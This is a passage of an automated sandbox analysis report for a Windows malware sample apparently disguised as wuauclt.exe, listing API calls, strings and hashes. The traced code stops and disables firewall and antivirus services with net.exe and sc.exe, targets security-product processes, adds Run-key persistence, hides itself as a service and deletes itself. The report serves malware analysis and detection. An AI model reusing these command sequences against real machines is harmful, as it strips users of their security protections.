                                                                            • ShellExecuteA.SHELL32(00000000,open,net.exe,stop sharedaccess,00000000,00000000), ref: 00407402
                                                                            • ShellExecuteA.SHELL32(00000000,open,net.exe,stop KVWSC,00000000,00000000), ref: 0040741C
                                                                            • ShellExecuteA.SHELL32(00000000,open,sc.exe,config KVWSC start= disabled,00000000,00000000), ref: 00407436
                                                                            • ShellExecuteA.SHELL32(00000000,open,net.exe,stop KVSrvXP,00000000,00000000), ref: 00407450
                                                                            • ShellExecuteA.SHELL32(00000000,open,sc.exe,config KVSrvXP start= disabled,00000000,00000000), ref: 0040746A
                                                                            • ShellExecuteA.SHELL32(00000000,open,net.exe,stop kavsvc,00000000,00000000), ref: 00407484
                                                                            • ShellExecuteA.SHELL32(00000000,open,sc.exe,config kavsvc start= disabled,00000000,00000000), ref: 0040749E
                                                                            • ShellExecuteA.SHELL32(00000000,open,sc.exe,config RsRavMon start= disabled,00000000,00000000), ref: 004074B8
                                                                            • ShellExecuteA.SHELL32(00000000,open,net.exe,stop RsCCenter,00000000,00000000), ref: 004074D2
                                                                            • ShellExecuteA.SHELL32(00000000,open,sc.exe,config RsCCenter start= disabled,00000000,00000000), ref: 004074EC
                                                                            • ShellExecuteA.SHELL32(00000000,open,net.exe,stop RsRavMon,00000000,00000000), ref: 00407506
                                                                            • Sleep.KERNEL32(00000320,00000000,open,net.exe,stop RsRavMon,00000000,00000000,00000000,open,sc.exe,config RsCCenter start= disabled,00000000,00000000,00000000,open,net.exe), ref: 00407510
                                                                            • FindWindowA.USER32(#32770,00407944), ref: 0040751F
                                                                            • FindWindowExA.USER32(00000000,00000000,Button,00407958), ref: 00407531
                                                                            • SendMessageA.USER32(00000000,000000F5,00000000,00000000), ref: 00407544
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000006,00000320,00000000,open,net.exe,stop RsRavMon,00000000,00000000,00000000,open,sc.exe,config RsCCenter start= disabled,00000000,00000000,00000000), ref: 00407681
                                                                            • DeleteFileA.KERNEL32(00000000,00000001,00000000,00000000,00000006,00000320,00000000,open,net.exe,stop RsRavMon,00000000,00000000,00000000,open,sc.exe,config RsCCenter start= disabled), ref: 004076D8
                                                                            • Sleep.KERNEL32(00001770,00000000,0040775D,?,00000003,00000000,00000000), ref: 004076E4
                                                                              • Part of subcall function 00404F2C: GetWindowsDirectoryA.KERNEL32(?,00000104,?,00407C31,00000000,00407D2A,?,00000000,00000000,00000000,00000000,00000000), ref: 00404F3F
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000006,00001770,00000000,0040775D,?,00000003,00000000,00000000), ref: 00407709
                                                                              • Part of subcall function 00404AF8: RegSetValueExA.ADVAPI32(00000000,?,00000000,00000001,?,00000000,00000000,00404B5E), ref: 00404B3D
                                                                              • Part of subcall function 00404AF8: RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000001,?,00000000,00000000,00404B5E), ref: 00404B43
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: ExecuteShell$FileSleep$AttributesFindWindow$CloseDeleteDirectoryMessageSendValueWindows
                                                                            • String ID: /s $"NoDriveTypeAutoRun"=dword:bd$#32770$Button$CCenter.exe$EGHOST.exe$KVCenter.kxp$KVMonXP.exe$KVSrvXp_1.exe$Kav.exe$KavPFW.exe$KpopMon.exe$Kvsrvxp.exe$Microsoft$Nvsvc32.exe$PFW.exe$RAVMON.exe$RAVTIMER.exe$REGEDIT4$RRfwMain.exe$RavMonD.exe$RavService.exe$RfwMain.exe$Rtvscan.exe$Software\Microsoft\Windows\CurrentVersion\Run$VPTray.exe$[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]$config KVSrvXP start= disabled$config KVWSC start= disabled$config RsCCenter start= disabled$config RsRavMon start= disabled$config kavsvc start= disabled$kav32.exe$kavstart.exe$kavsvc.exe$kvwsc.exe$net.exe$net.exe$net1.exe$noruns.reg$open$regedit.exe$regedit.exe$sc.exe$sc.exe$sc1.exe$stop KVSrvXP$stop KVWSC$stop RsCCenter$stop RsRavMon$stop kavsvc$stop sharedaccess$wuauclt.exe
                                                                            • API String ID: 4147674485-668396500
                                                                            • Opcode ID: 2e8965b326de6fdb6a0ae8cd9e9f8423980809dc199509a3da33a66f5c7fd3a0
                                                                            • Instruction ID: ad58a2a6b321d20f2a5f7c4230813dddbb1cdd15f012d9e1a88ffbed65f06cfb
                                                                            • Opcode Fuzzy Hash: 2e8965b326de6fdb6a0ae8cd9e9f8423980809dc199509a3da33a66f5c7fd3a0
                                                                            • Instruction Fuzzy Hash: A6A10DB5F8828526D700B7A68C47F5E75649B84B09F20C47BB7147A2C3CABCB944867F
                                                                            Function 00404540 Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,004047C7,00000000,?,004048B9,00000000,004049BC,?,?,?,?,?,00407553,00000320,00000000), ref: 00404554
                                                                            • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0040456C
                                                                            • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 0040457E
                                                                            • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 00404590
                                                                            • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 004045A2
                                                                            • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 004045B4
                                                                            • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 004045C6
                                                                            • GetProcAddress.KERNEL32(00000000,Process32First), ref: 004045D8
                                                                            • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004045EA
                                                                            • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 004045FC
                                                                            • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 0040460E
                                                                            • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 00404620
                                                                            • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 00404632
                                                                            • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00404644
                                                                            • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00404656
                                                                            • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 00404668
                                                                            • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 0040467A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$HandleModule
                                                                            • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                                            • API String ID: 667068680-597814768
                                                                            • Opcode ID: 6916ce2368bd7bf410b6b2501a9db0e96e5eb6e71815e111a167491911190605
                                                                            • Instruction ID: 023e8f8eb36bf4682933e0370cb39b54a2ce952b5e9d5c020180350aed9ba6c9
                                                                            • Opcode Fuzzy Hash: 6916ce2368bd7bf410b6b2501a9db0e96e5eb6e71815e111a167491911190605
                                                                            • Instruction Fuzzy Hash: 6231C9F06403509FDB11EBB5AA85A2933E8EB96305750657ABA00EF6D4D77CC810CB1E
                                                                            Function 00406C30 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 207windowsleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00404F2C: GetWindowsDirectoryA.KERNEL32(?,00000104,?,00407C31,00000000,00407D2A,?,00000000,00000000,00000000,00000000,00000000), ref: 00404F3F
                                                                            • FindWindowA.USER32(#32770,00000000), ref: 00406CE5
                                                                            • GetWindowTextA.USER32(00000000,0040AEDC,00000104), ref: 00406D17
                                                                            • FindWindowExA.USER32(00000000,00000000,#32770,00000000), ref: 00406DC3
                                                                            • FindWindowExA.USER32(00000000,00000000,AfxWnd42,00000000), ref: 00406DE1
                                                                            • FindWindowExA.USER32(00000000,00000000,RICHEDIT,00000000), ref: 00406DFF
                                                                            • FindWindowExA.USER32(00000000,00000000,Button,00406F50), ref: 00406E20
                                                                            • FindWindowExA.USER32(00000000,00000000,RichEdit20A,00000000), ref: 00406E3E
                                                                            • SendMessageA.USER32(00000000,000000C2,000000B4,00000000), ref: 00406E7E
                                                                            • Sleep.KERNEL32(000002BC,00000000,000000C2,000000B4,00000000,00000000,00000000,RichEdit20A,00000000,00000000,00000000,Button,00406F50,00000000,00000000,RICHEDIT), ref: 00406E88
                                                                            • SendMessageA.USER32(00000000,000000F5,00000000,00000000), ref: 00406E9E
                                                                            • SendMessageA.USER32(00000000,0000000C,00000000,00406F70), ref: 00406EB4
                                                                            • FindWindowExA.USER32(00000000,00000000,#32770,00000000), ref: 00406ECC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Find$MessageSend$DirectorySleepTextWindows
                                                                            • String ID: #32770$AfxWnd42$Button$RICHEDIT$RichEdit20A$bbyb.dll
                                                                            • API String ID: 4044579835-3821104793
                                                                            • Opcode ID: 46ea4ccefd413482a5f41c00c70f7caddd4a92c960c66dc50a95b78dce87a446
                                                                            • Instruction ID: c2cdf916bea0aacb3b287b9c217ab58656c52756c70eb46c7f93f36c1c6821be
                                                                            • Opcode Fuzzy Hash: 46ea4ccefd413482a5f41c00c70f7caddd4a92c960c66dc50a95b78dce87a446
                                                                            • Instruction Fuzzy Hash: 53813670340206AFE710EF64D986F5A77A9EB85704F51407AF901BB2E2D7B8AD50CB9C
                                                                            Function 004025DC Relevance: 16.6, APIs: 9, Strings: 2, Instructions: 109COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CharNextA.USER32(00000000,?,00000000,00000000,?,0040270E), ref: 00402613
                                                                            • CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040270E), ref: 0040261D
                                                                            • CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040270E), ref: 0040263A
                                                                            • CharNextA.USER32(00000000,?,00000000,00000000,?,0040270E), ref: 00402644
                                                                            • CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040270E), ref: 0040266D
                                                                            • CharNextA.USER32(00000000,00000000,00000000,?,00000000,00000000,?,0040270E), ref: 00402677
                                                                            • CharNextA.USER32(00000000,00000000,00000000,?,00000000,00000000,?,0040270E), ref: 0040269B
                                                                            • CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040270E), ref: 004026A5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: CharNext
                                                                            • String ID: "$"
                                                                            • API String ID: 3213498283-3758156766
                                                                            • Opcode ID: 5093a5edd9145d7613c737a5e25656be4a5b57bdaeaac2877119e0e25e71438b
                                                                            • Instruction ID: 378b31890ac25dcdd700d67078953c889e09c483e5a359b479ed21abc8ee7f2f
                                                                            • Opcode Fuzzy Hash: 5093a5edd9145d7613c737a5e25656be4a5b57bdaeaac2877119e0e25e71438b
                                                                            • Instruction Fuzzy Hash: 1921E8606043912ADF3129754EC836B6B894A1B704B680DBB95C1BB3C7D4FE488B976E
                                                                            Function 004053F6 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 77windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetClassNameA.USER32(?,?,00000100), ref: 00405443
                                                                            • SendMessageA.USER32(?,0000000D,00000100,?), ref: 0040547E
                                                                            • SendMessageA.USER32(?,0000000C,00000000,00405588), ref: 004054F9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$ClassName
                                                                            • String ID: Edit$lqrs>*)tsr(gra`lvjhf*fin+$lqrs>*)tsr(lj``lvapg*fin+
                                                                            • API String ID: 787153527-2237947760
                                                                            • Opcode ID: e6dd1c336fd68df088ead3fc59d869204d5951e62e543e13391f321828f78c9e
                                                                            • Instruction ID: 9fb5fde48b0b51318b29d690c95603ab6f24dde2ee0048554a78b08ccb085c6b
                                                                            • Opcode Fuzzy Hash: e6dd1c336fd68df088ead3fc59d869204d5951e62e543e13391f321828f78c9e
                                                                            • Instruction Fuzzy Hash: B3214FB0A4061C6ADB20EF64CC89BDAB7B9EB48304F5045F7B508F6181D6B85E808E98
                                                                            Function 004053F8 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 76windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetClassNameA.USER32(?,?,00000100), ref: 00405443
                                                                            • SendMessageA.USER32(?,0000000D,00000100,?), ref: 0040547E
                                                                            • SendMessageA.USER32(?,0000000C,00000000,00405588), ref: 004054F9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$ClassName
                                                                            • String ID: Edit$lqrs>*)tsr(gra`lvjhf*fin+$lqrs>*)tsr(lj``lvapg*fin+
                                                                            • API String ID: 787153527-2237947760
                                                                            • Opcode ID: 3734ebd2b0ab7302f724bbed31c4d32c1c78400722493264dc8d04771cd8ac10
                                                                            • Instruction ID: 0425c3d2602aa380be99970c4860828b2cef43e56b29c4e0dd38b7bacb301f0e
                                                                            • Opcode Fuzzy Hash: 3734ebd2b0ab7302f724bbed31c4d32c1c78400722493264dc8d04771cd8ac10
                                                                            • Instruction Fuzzy Hash: BF2150B094061C6ADB20EF64CC89BDBB7B9EB48304F5045F7A508B7181D7B85F808E98
                                                                            Function 004049CC Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 29libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetVersionExA.KERNEL32(?,00408D88,00000000,00000000,00000000,00000000,00400000,00000000,00000104,00000000,00000080,bbyb,bbyb,00000000,00408DA8), ref: 004049DA
                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,00408D88,00000000,00000000,00000000,00000000,00400000,00000000,00000104,00000000,00000080,bbyb,bbyb,00000000,00408DA8), ref: 004049F5
                                                                            • GetProcAddress.KERNEL32(00000000,RegisterServiceProcess), ref: 00404A13
                                                                            • FreeLibrary.KERNEL32(00000000,?,00408D88,00000000,00000000,00000000,00000000,00400000,00000000,00000104,00000000,00000080,bbyb,bbyb,00000000,00408DA8), ref: 00404A2D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: Library$AddressFreeLoadProcVersion
                                                                            • String ID: RegisterServiceProcess$kernel32.dll
                                                                            • API String ID: 493525861-4020013434
                                                                            • Opcode ID: ba7912c793e05f345d12aa31dfe9059e509e26ea0c3e34657816526bc27800df
                                                                            • Instruction ID: 584902bb4f43a048dfb4edc9276af123f762f69e99b58a94aa2e669f31c097c7
                                                                            • Opcode Fuzzy Hash: ba7912c793e05f345d12aa31dfe9059e509e26ea0c3e34657816526bc27800df
                                                                            • Instruction Fuzzy Hash: F6F012F17C13009BD611EB759E0AB1932A4E7E4706F40447BB784B72D1E77D8456CA1E
                                                                            Function 00403174 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403196
                                                                            • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,004031E5,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 004031C9
                                                                            • RegCloseKey.ADVAPI32(?,004031EC,00000000,?,00000004,00000000,004031E5,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 004031DF
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: CloseOpenQueryValue
                                                                            • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                            • API String ID: 3677997916-4173385793
                                                                            • Opcode ID: 05a39cdded3a68a7272965c21735343be09680b9c2fcd28f0635233796265c19
                                                                            • Instruction ID: 5b13f427154e47eb786ec22587604168a85df8ea8a10eb055b4820c5abfa16c8
                                                                            • Opcode Fuzzy Hash: 05a39cdded3a68a7272965c21735343be09680b9c2fcd28f0635233796265c19
                                                                            • Instruction Fuzzy Hash: 7A019275500308BADB11DF909C42FAA7BBCE709701F6005B6B910F65D1E6799B50D75C
                                                                            Function 004050D8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 48processCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetEnvironmentVariableA.KERNEL32(Comspec,?,00000104,00000000,00405197), ref: 00405118
                                                                              • Part of subcall function 004026C8: GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 004026EC
                                                                            • WinExec.KERNEL32(00000000,004051C8), ref: 00405174
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: EnvironmentExecFileModuleNameVariable
                                                                            • String ID: /c del "$Comspec
                                                                            • API String ID: 451393584-1443122049
                                                                            • Opcode ID: 215997d5803e9b59eb04cb7df286bba4695a682e93fbde3f27ae696503c78bdd
                                                                            • Instruction ID: 6f675109087fc91689d1b7d6d1dc425710a191357d6ada5f1f571d808edafb71
                                                                            • Opcode Fuzzy Hash: 215997d5803e9b59eb04cb7df286bba4695a682e93fbde3f27ae696503c78bdd
                                                                            • Instruction Fuzzy Hash: 74118270E006185FDB25EB61CC02BDABBB9EB49700F5145FBA648F61C1D6F84A808E65
                                                                            Function 004050DC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46processCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetEnvironmentVariableA.KERNEL32(Comspec,?,00000104,00000000,00405197), ref: 00405118
                                                                              • Part of subcall function 004026C8: GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 004026EC
                                                                            • WinExec.KERNEL32(00000000,004051C8), ref: 00405174
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: EnvironmentExecFileModuleNameVariable
                                                                            • String ID: /c del "$Comspec
                                                                            • API String ID: 451393584-1443122049
                                                                            • Opcode ID: e562fe7082f41e4b9f578b462bb6e237adde477b1983bc868482d80e88f8d696
                                                                            • Instruction ID: 5e39bd01bb10aff84b20b8e8c33debca7a73d60c2ec277af15caf5139dfd1cd6
                                                                            • Opcode Fuzzy Hash: e562fe7082f41e4b9f578b462bb6e237adde477b1983bc868482d80e88f8d696
                                                                            • Instruction Fuzzy Hash: 5E116170E0061C5FDB25EB61CC02BDABBB9EB48700F5145F6A608F61C1E6F85A808E69
                                                                            Function 004017B8 Relevance: 6.0, APIs: 4, Instructions: 48memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RtlInitializeCriticalSection.NTDLL(0040A5B0), ref: 004017CE
                                                                            • RtlEnterCriticalSection.NTDLL(0040A5B0), ref: 004017E1
                                                                            • LocalAlloc.KERNEL32(00000000,00000FF8,00000000,0040186E,?,?,00402052), ref: 0040180B
                                                                            • RtlLeaveCriticalSection.NTDLL(0040A5B0), ref: 00401868
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                            • String ID:
                                                                            • API String ID: 730355536-0
                                                                            • Opcode ID: 798072171faa28aa9536d3e14e8c46776961f52050d9d4218a56882117630c0f
                                                                            • Instruction ID: 5f09b27ca823af9dd1356ce4e247dec4ea3fcd1be7825b8ef208c2b79a25235a
                                                                            • Opcode Fuzzy Hash: 798072171faa28aa9536d3e14e8c46776961f52050d9d4218a56882117630c0f
